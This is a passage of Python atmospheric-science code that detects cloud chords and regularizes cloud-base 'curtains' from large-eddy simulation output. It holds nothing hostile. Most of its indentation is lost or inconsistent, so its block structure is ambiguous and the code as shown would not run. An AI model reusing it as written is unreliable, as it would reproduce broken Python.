# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
n_chords = 0
#I will try lists first, which I will then convert to arrays in the end before saving in pandas
chord_timesteps = []
chord_length = []
chord_duration = []
chord_time = []
chord_height = [] #percentile of cloud base
chord_w = []
chord_w_up = [] #mean over updrafts
chord_w_base = []
chord_w_star = []
chord_thl_star = []
chord_qt_star = []
chord_thl = []
chord_thl_25 = []
chord_thl_75 = []
chord_qt = []
chord_qt_25 = []
chord_qt_75 = []
    chord_w_flux = [] #Sum of w just below cloud base over the chord
    #Percentile arrays of the cloud base w (all points and updrafts only)
chord_w_per = np.zeros([0,n_percentiles])
chord_w_per_up = np.zeros([0,n_percentiles])
    #This is now a bit trickier than for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
    #then later apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
thl_prof = file_prof['thl'][:,:]
qt_prof = file_prof['qt'][:,:]
nz_prof = w2.shape[1]
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
print('dz: ',dz)
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
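    #(dewpoint from the Magnus approximation below, then the ~125 m per K of
    # dewpoint depression rule of thumb for the LCL height)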
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
        #Minimum of the LCL and the variance-based height plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
            print('warning, cbl height higher than 0.6 of the domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
thl_2d = file_col.variables['thl'][:]
thl_2d = thl_2d.transpose()
qt_2d = file_col.variables['qt'][:]
qt_2d = qt_2d.transpose()
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
#lets try saving memory by closing files
#file_col.close()
#The needed cbl height
cbl_1d = t_1d*0
            #The needed surface buoyancy flux
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d = t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
            #to get anomalies of thl and qt we subtract the closest mean profile
for tt in range(len(time_prof)):
#globals().update(locals())
tmp_matrix = thl_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = thl_prof[tt,:]
#because the vectors don't perfectly align
thl_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
tmp_matrix = qt_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = qt_prof[tt,:]
#because the vectors don't perfectly align
qt_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
qt_3d = grab_3d_field(file_qt ,it,'qt')
thl_3d = grab_3d_field(file_thl ,it,'thl')
                #Here we reshape the 3D fields into 2D slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
qt_2d = np.array(qt_3d.reshape((nz,nx*ny)))
thl_2d = np.array(thl_3d.reshape((nz,nx*ny)))
                #Now we do the same thing with the transposed field; this used to be an either/or, now we just append it
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
qt_3d = np.transpose(qt_3d, (0, 2, 1))
thl_3d = np.transpose(thl_3d, (0, 2, 1))
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
thl_2d = np.hstack([thl_2d ,np.array(thl_3d.reshape((nz,nx*ny)))])
qt_2d = np.hstack([qt_2d ,np.array(qt_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del thl_3d
del qt_3d
#hopefully this helps
gc.collect()
#Getting anomalies of thl and qt
qt_2d[:,:] = (qt_2d.transpose() - qt_prof[it,:]).transpose()
thl_2d[:,:] = (thl_2d.transpose() - thl_prof[it,:]).transpose()
                #to get the fake time vector we load the wind from the profile data; the grid spacing divided by the wind speed gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, str(V_ref)[:4], str(time_resolution)[:4] )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
#dt_1d = t_1d*0
#dt_1d[1:] = t_1d[1:]-t_1d[:-1]
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
thl_2d = np.zeros((nz,1))
qt_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
        #Used to have a different method using nans that doesn't work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
                cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
        #Now find cloud bases lower than the max CBL height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
### Clustering 1D
#Now we simply go through all cloudy timesteps and detect chords
        #If they fulfill the chord time requirements and have a number of values which fulfills cell_min they are counted as a chord
        #and their properties are calculated immediately
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
chord_idx_list = []
while t_cloudy_idx < len(cbl_cl_idx)-1:# and n_curtain<100*it: ####################################GO HERE TO SET MAXIMUM CURTAIN
#print(t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
#Originally only cared if they fulfilled cloud criteria, but now I also hard coded that neighboring cells always count
##Check if the index of the next cloudy cell is the same as the next index in total, if so the cells are connected
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
            #Checking if it fulfills the chord criteria regarding time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
ch_duration = 0
if ch_duration>t_min and ch_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_chord_end]))
#list of relevant chord indexes
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
### Now appending chord properties
chord_timesteps.append(t_chord_end-t_chord_begin)
chord_duration.append(ch_duration)
chord_length.append(ch_duration*V_ref)
tmp_base_height = np.percentile(cl_base[ch_idx_l],base_percentile)*dz
chord_height.append(tmp_base_height) #25th percentile of cloud base
surf_b_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
w_star = (tmp_base_height*surf_b_flux)**(1./3.)
surf_qt_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
qt_star = surf_qt_flux/w_star
surf_thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
thl_star = surf_thl_flux/w_star
chord_w_star.append(w_star )
chord_thl_star.append(thl_star )
chord_qt_star.append(qt_star )
chord_w_base.append(np.mean(w_2d[cl_base[ch_idx_l],ch_idx_l]))
chord_w.append(np.mean(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_thl.append(np.mean(thl_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
                    #get a quarter and three quarters of the cloud base height
cl_base_25_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)/4.)
cl_base_75_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)*3./4.)
#print ('cl base idx:',np.percentile(cl_base[ch_idx_l],base_percentile),'clbase/4:',cl_base_25_idx[0],'clbase3/4:',cl_base_75_idx[0])
chord_thl_25.append(np.mean(thl_2d[cl_base_25_idx,ch_idx_l]))
chord_thl_75.append(np.mean(thl_2d[cl_base_75_idx,ch_idx_l]))
chord_qt.append(np.mean(qt_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_qt_75.append(np.mean(qt_2d[cl_base_75_idx,ch_idx_l]))
chord_qt_25.append(np.mean(qt_2d[cl_base_25_idx,ch_idx_l]))
chord_w_flux.append(np.sum(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
w_base_vec = w_2d[cl_base[ch_idx_l]-1,ch_idx_l]
chord_w_up.append(np.mean(w_base_vec[w_base_vec>0.0]))
tmp_w_per = np.percentile(w_base_vec,percentiles)
if len(w_base_vec[w_base_vec>0.0])>0:
tmp_w_per_up = np.percentile(w_base_vec[w_base_vec>0.0],percentiles)
else:
tmp_w_per_up = np.zeros(n_percentiles)
tmp_w_per_up[:] = 'nan'
chord_w_per = np.vstack([chord_w_per,tmp_w_per])
                    chord_w_per_up = np.vstack([chord_w_per_up,tmp_w_per_up])
if data_dim_flag==1:
chord_time.append(np.mean(t_1d[ch_idx_l]))
if data_dim_flag==3:
chord_time.append(time_prof[it])
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('iterable: ',it)
print('n_chords: ',n_chords)
print('number of time points included: ',len(cbl_cl_idx))
    #Converting the lists to arrays before saving; probably not strictly necessary, but done anyway
chord_timesteps=np.asarray(chord_timesteps)
chord_duration =np.asarray(chord_duration)
chord_length =np.asarray(chord_length)
chord_height =np.asarray(chord_height)
chord_w_base =np.asarray(chord_w_base)
chord_w_star =np.asarray(chord_w_star)
chord_thl_star =np.asarray(chord_thl_star)
chord_qt_star =np.asarray(chord_qt_star)
chord_w =np.asarray(chord_w)
chord_w_up =np.asarray(chord_w_up)
chord_w_flux =np.asarray(chord_w_flux)
chord_thl =np.asarray(chord_thl)
chord_thl_25 =np.asarray(chord_thl_25)
chord_thl_75 =np.asarray(chord_thl_75)
chord_qt =np.asarray(chord_qt)
chord_qt_25 =np.asarray(chord_qt_25)
chord_qt_75 =np.asarray(chord_qt_75)
chord_time =np.asarray(chord_time)
#Saving
print('all chords: ',len(chord_duration))
save_string_base = 'chord_prop_'+date+'_d'+str(data_dim_flag)+'_ct'+str(chord_times)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_chords)
filename_chord_panda = directory_output+save_string_base+'.pkl'
data_for_panda = list(zip(chord_timesteps,chord_duration,chord_length,chord_height,chord_w_base,chord_w,chord_w_flux,chord_time,chord_w_up,chord_w_per,chord_w_per_up,
chord_w_star,chord_thl_star,chord_qt_star,
chord_thl,chord_thl_25,chord_thl_75,chord_qt,chord_qt_25,chord_qt_75))
df = pd.DataFrame(data = data_for_panda, columns=['timesteps','duration','length','height','w_base','w','w_flux','time','w up','w per','w per up',
'w star','thl star','qt star',
'thl','thl 25','thl 75','qt','qt 25','qt 75'])
df.to_pickle(filename_chord_panda)
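    # The pickle can later be reloaded for analysis of the per-chord statistics, e.g.
    #   df = pd.read_pickle(filename_chord_panda)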
time_end = ttiimmee.time()
print('total run time of proc_chords in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print('chordlength properties saved as panda in ',filename_chord_panda)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#If the input data is a 3D field it will always go over x and y directions
#Two different scale_flags added to rotate the curtain to point upwind.
#TODO
#plot_flag disabled for the time being
def proc_beard_regularize(reg_var = 'w',
date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output = 'data_curtains/',
data_dim_flag=1,
base_smoothing_flag=2,
plot_curtains_flag = 0,
base_percentile = 25,
special_name='',
scale_flag=2,
chord_times = 0,
anomaly_flag = 0,
N_it_max=1e9,
N_it_min=0,
size_bin_flag=0,
N_bins=12,
bin_size = 250,
curtain_extra = 1.0,
chord_max = 1e9,
boundary_scaling_flag = 0
):
# reg_var = variable that will be regularized
# plot_curtains_flag: 0 nothing, 1 plots pre and post regularization plots of reg_var
# data_dim_flag: 1 = column, 3 = 3D snapshot
    # time_slice_curtain: 0 only puts out the total sums, 1: adds a separate output for each time slice, is needed for scale_flag
# scale_flag: If 0, nothing, if 1, it scales the output by u/sqrt(u^2+v^2) and flips the vector if u>0. Is set to 0 if data_dim_flag==1
# 1 the ref_lvl used is determined from the mean cloud base height
# 2, similar to 1 but now using a profile
#
    # base_smoothing_flag: 0 use mix of percentile and cloud base as done by Neil, 1: smooth out base after setting it with running average 2: just use percentile defined by base_percentile
# base_percentile: percentile used to find chordlength bottom
    # chord_times: 0 use Neil's values, 1 use values that fit the model output exactly with no gap possible
    # anomaly_flag: 0 use reg_var as it is. 1 use reg_var - profile. Works easiest for 3d output, 1d_flag needs to use the closest mean profile
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
    # size_bin_flag bins the beards by their chord length, using N_bins bins of bin_size meters (default 12 bins of 250 m). The lowest bin should be empty, because we only calculate curtains when at least curtain_min cells are used
# curtain_extra: Regularized chord length before and after in the curtain, default is 1
# chord_max: Maximum number of chords. If data_dim_flag=3 it will jump to the y direction when chord_max/2 is reached
# boundary_scaling_flag: 0 nothing, 1 uses the surface fluxes and cloud base height to calculate either w/w*, thl'/thl*, or qt'/qt*
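    # Illustrative call (values are assumptions):
    #   proc_beard_regularize(reg_var='w', date_str='20160611', data_dim_flag=3,
    #                         scale_flag=2, N_it_max=10)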
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #Is recalculated from the profile file later on
dx = 25.0
date = date_str
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 120000
cell_min = 3 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed to convert into a curtain
# #1D clustering parameters,
#set super strict
if chord_times == 1:
t_gap = 0.#No gaps allowed!
t_min = 0
t_max = 1e9
cell_min = 10 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed per curtain
#value used to determine existence of cloud
ql_min = 1e-5
    z_min = 10 #Index of the minimum z level of the cbl
#z_min = 0 #Index of minimum z_vlvl of the cbl
#Flag clean up
if data_dim_flag==1:
scale_flag=0
#Creating dictionary to save all properties
settings_dict = {
'reg_var': reg_var,
'date_str':date_str,
'directory_input':directory_input,
'data_dim_flag':data_dim_flag,
'base_smoothing_flag':base_smoothing_flag,
'plot_curtains_flag' :plot_curtains_flag,
'base_percentile':base_percentile,
'special_name':special_name,
'scale_flag':scale_flag,
'chord_times':chord_times,
'anomaly_flag':anomaly_flag,
'N_it_max':N_it_max,
'N_it_min':N_it_min,
'size_bin_flag':size_bin_flag,
'bin_size':bin_size,
'N_bins':N_bins,
'curtain_extra':curtain_extra
}
#moved to an inner function to avoid issues with global and local variables
def func_curtain_reg(input_2d_field):
#function regularizes to cloud base
        #2019-03-20: added smoother to hopefully avoid the impact of harsh jumps
#2019-03-28: Added simplified version for base_smoothing_flag == 2 which gets rid of 1D pre interpolation
#I originally used interp2d, tried griddata but it was a lot slower
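        #In short: the curtain is mapped onto chord-relative coordinates, with time
        #scaled so the chord spans [-0.5, 0.5] (plus curtain_extra on each side) and
        #height scaled so the chord cloud base sits at 1.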
#Calculating the regularized t axis but for original resolution
#It is expected to go a bit beyond -1.5 and 1.5, total width defined by curtain_extra
#takes the original time vector, subtracts it by mean time, then scales it by 1/(time_end_chord-time_beg_chord)
t_reg_orig = t_1d[idx_beg_curtain:idx_end_curtain]-(time_beg_chord+time_end_chord)/2.
t_reg_orig = t_reg_orig/(time_end_chord-time_beg_chord)
#Now we calculate the new regularized grid with the correct vertical but low/original horizontal/time resolution
#mesh_t_low_z_high_x,mesh_t_low_z_high_z = np.meshgrid(t_reg_orig,z_reg_mid) #seems not to be needed
var_t_low_z_high = np.zeros([curtain_cells,n_z_reg])
#introducing z_idx_base vector
#Assigning reference cloud base where no cloud present
z_idx_base=cl_base*1.0+0.0
z_idx_base[:] = z_idx_base_default
for i in range(idx_beg_chord,idx_end_chord):
if i>idx_beg_chord-1 and i<idx_end_chord and cl_base[i]<cbl_1d[i]:
z_idx_base[i] = cl_base[i]
#Here the smoother comes into play:
#We started with a simple 5 cell running mean,
#But now we are making it a function of the chordlength, using a 0.1 running mean
if base_smoothing_flag ==1:
z_idx_base_smooth = z_idx_base*1.0
N = int(np.floor(idx_end_chord-idx_beg_chord)*0.1)
for i in range(idx_beg_chord-N,idx_end_chord+N):
z_idx_base_smooth[i] = sum(z_idx_base[i-N:i+N])/(2*N)
z_idx_base[:] = z_idx_base_smooth[:]
if base_smoothing_flag==2:
#just put the percentile back
z_idx_base[:] = z_idx_base_default
#default version for variable base height
if base_smoothing_flag<2:
#Now for each of the columns of the original curtain a vertical interpolation is done
for i in range(idx_beg_curtain,idx_end_curtain):
#assigining column value
var_orig_col = input_2d_field[:,i]
#Regularizing the z axes so that cloud base is at 1
d_z_tmp = 1.0/z_idx_base[i]
nz = var_orig_col.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
                #Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_col = np.hstack([var_orig_col[0],var_orig_col])
                #1D vertical interpolation to get the right columns and assign them one by one to var_t_low_z_high
#f = interp1d(z_reg_orig, var_orig_col, kind='next')
f = interp1d(z_reg_orig, var_orig_col, kind='nearest')
try:
var_reg_inter = f(z_reg_mid)
except:
print(z_idx_base[i])
print(z_reg_orig)
print(z_reg_mid)
var_t_low_z_high[i-idx_beg_curtain,:] = var_reg_inter
            #Now that we have var_t_low_z_high we interpolate in 2D onto the full regularized grid
#print(t_reg_orig.shape,z_reg_mid.shape)
f = interp2d(t_reg_orig, z_reg_mid, var_t_low_z_high.transpose(), kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
#constant base height version
if base_smoothing_flag==2:
#Regularizing the z axes so that cloud base is at 1, since z_idx_base is the same everywhere I just use idx_beg_curtain as one.
i=idx_beg_curtain
d_z_tmp = 1.0/z_idx_base[i]
var_orig_2d = input_2d_field[:,idx_beg_curtain:idx_end_curtain]
nz = var_orig_2d.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_2d = np.vstack([var_orig_2d[0,:],var_orig_2d])
f = interp2d(t_reg_orig, z_reg_orig,var_orig_2d, kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
return var_curtain
#Creating regularized grid.
d_reg = 0.005
n_z_reg = int(1.5/d_reg)
n_t_reg = int((1+2*curtain_extra)/d_reg)
t_reg_bound = np.linspace(-0.5-curtain_extra,0.5+curtain_extra ,n_t_reg+1)
t_reg_mid = np.linspace(-0.5-curtain_extra+d_reg/2,0.5+curtain_extra-d_reg/2 ,n_t_reg)
z_reg_bound = np.linspace(0,1.5 ,n_z_reg+1)
z_reg_mid = np.linspace(0+d_reg/2,1.5-d_reg/2 ,n_z_reg)
mesh_curtain_t,mesh_curtain_z = np.meshgrid(t_reg_mid,z_reg_mid)
var_curtain = np.zeros([n_t_reg,n_z_reg])
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_curtain_up = 0
n_curtain_dw = 0
if size_bin_flag==1:
        #N_bins and bin_size are taken from the function arguments (defaults: 12 bins of 250 m)
n_curtain_bin = np.zeros([N_bins])
n_curtain_bin_up = np.zeros([N_bins])
n_curtain_bin_dw = np.zeros([N_bins])
var_curtain_bin_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_up_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_dw_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
        mid_bin_size = np.linspace(bin_size/2,-bin_size/2+N_bins*bin_size,N_bins)
print('mid_bin_size',mid_bin_size)
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var,read='r')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
extra_string = ''
n_chords = 0
    #This is now a bit trickier than for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
    #then later apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
        #Minimum of the LCL and the variance-based height plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
            print('warning, cbl height higher than 0.6 of the domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#Setting curtains for var
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_chord = 0
n_curtain_up = 0
n_curtain_dw = 0
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
print('n_curtain: ',n_curtain)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
print('t_1d',t_1d)
            #Load the var file, even if it means that we load w_2d or ql_2d twice
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
            #to get anomalies we subtract the closest mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
